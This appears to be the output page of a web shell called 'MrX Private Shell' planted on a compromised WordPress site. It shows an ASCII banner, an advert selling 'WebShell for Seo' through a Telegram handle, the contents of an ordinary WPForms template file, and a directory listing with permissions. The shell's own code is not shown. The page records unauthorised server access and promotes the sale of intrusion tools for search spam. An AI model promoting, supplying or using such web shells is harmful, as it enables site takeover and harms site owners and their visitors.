__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Choice template for the Entry Print page.
*
* @var object $entry Entry.
* @var array $form_data Form data and settings.
* @var array $field Entry field.
* @var string $choice_type Checkbox or radio.
* @var bool $is_checked Is the choice checked?
* @var array $choice Choice data.
*/
if ( ! defined( 'ABSPATH' ) ) {
exit;
}
printf(
'<div class="field-value-choice field-value-choice-%1$s%2$s"><label><input type="%1$s"%3$s disabled>%4$s</label></div>',
esc_attr( $choice_type ),
$is_checked ? ' field-value-choice-checked' : '',
// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
$is_checked ? ' checked' : '',
wp_kses_post( $choice['label'] )
);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| choice.php | File | 715 B | 0640 |
|
| field.php | File | 1.96 KB | 0640 |
|
| fields.php | File | 1.96 KB | 0640 |
|
| footer.php | File | 330 B | 0640 |
|
| head.php | File | 3.71 KB | 0640 |
|
| image-choice.php | File | 896 B | 0640 |
|
| layout-field-column.php | File | 2.13 KB | 0640 |
|
| layout-field-row.php | File | 2.39 KB | 0640 |
|
| legend-end.php | File | 506 B | 0640 |
|
| legend-start.php | File | 4.34 KB | 0640 |
|
| no-fields.php | File | 335 B | 0640 |
|
| notes.php | File | 1.01 KB | 0640 |
|
| repeater-blocks.php | File | 2.09 KB | 0640 |
|
| repeater-column.php | File | 1.46 KB | 0640 |
|
| repeater-rows.php | File | 1.98 KB | 0640 |
|
| repeater.php | File | 993 B | 0640 |
|
| toggle-option.php | File | 426 B | 0640 |
|